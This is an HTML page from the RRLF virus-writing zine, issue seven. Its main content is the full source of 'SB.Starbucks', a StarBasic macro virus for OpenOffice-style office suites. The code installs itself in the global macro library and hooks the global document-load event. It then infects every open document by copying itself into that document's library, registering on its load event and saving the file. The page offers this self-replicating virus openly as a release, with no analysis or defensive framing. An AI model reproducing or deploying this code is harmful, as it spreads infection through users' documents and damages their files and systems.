<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<title>RRLF ZINE ISSUE SEVEN   -   SOURCES</title>
<link rel="stylesheet" type="text/css" href="../css/Style.css">
<script src="../js/Preload.js" language="javascript" type="text/javascript"></script>
<script src="../js/Hover.js" language="javascript" type="text/javascript"></script>
</head>

<body>
<table cellpadding="0" cellspacing="0" border="0">
 <tr><td>
 <table align="left" cellpadding="0" cellspacing="0" border="0">
  <tr>
   <td rowspan="3"><a href="../html/editorial.htm"><img src="../images/Top_01.jpg" alt="" border="0"></a></td>
   <td colspan="6"><img src="../images/Top_02.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><a href="../html/articles.htm"><img src="../images/Top_Articles_Out.jpg" alt="" border="0" id="articles" onMouseOver="ArticlesOver(1)" onMouseOut="ArticlesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_03.jpg" alt="" border="0"></td>
   <td><a href="../html/sources.htm"><img src="../images/Top_Sources_Out.jpg" alt="" border="0" id="sources" onMouseOver="SourcesOver(1)" onMouseOut="SourcesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_04.jpg" alt="" border="0"></td>
   <td><a href="../html/art.htm"><img src="../images/Top_Art_Out.jpg" alt="" border="0" id="art" onMouseOver="ArtOver(1)" onMouseOut="ArtOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_05.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><img src="../images/Top_06.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_07.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_08.jpg" alt="" border="0"></td>
  </tr>
 </table>
 </td></tr>
 <tr><td>
  <br>
  <div class="title" align="left">SB.Starbucks</div>
  <div class="title_by" align="left">by roy g biv</div>
  <br><a href="Starbucks" target="_blank" class="l">See also the project folder</a><br><br>
  <pre>
Sub Starbucks 'roy g biv - 06/06/06
set a=globalscope.basiclibraries.getbyname("Standard")
b="Starbucks"
c=basiclibraries.getbyname("Standard").getbyname(b)
dim d(1) as new com.sun.star.beans.PropertyValue
d(0).name="EventType"
d(0).value="StarBasic"
d(1).name="Script"
e="macro://"
f="/Standard."+b+"."+b+"()"
d(1).value=e+f
if not a.hasbyname(b)then
a.insertbyname b,c
createunoservice("com.sun.star.frame.GlobalEventBroadcaster").events.replacebyname "OnLoad",d()
end if
d(1).value=e+"."+f
e=createunoservice("com.sun.star.frame.Desktop").getcomponents.createenumeration
on error goto skip
while e.hasmoreelements
f=e.nextelement
g=f.basiclibraries.getbyname("Standard")
if not g.hasbyname(b)then
g.insertbyname b,c
f.events.replacebyname "OnLoad",d()
f.store
end if
skip:
wend
End Sub

  </pre>
  <br>
 </td></tr>
 </table>
</body>
</html>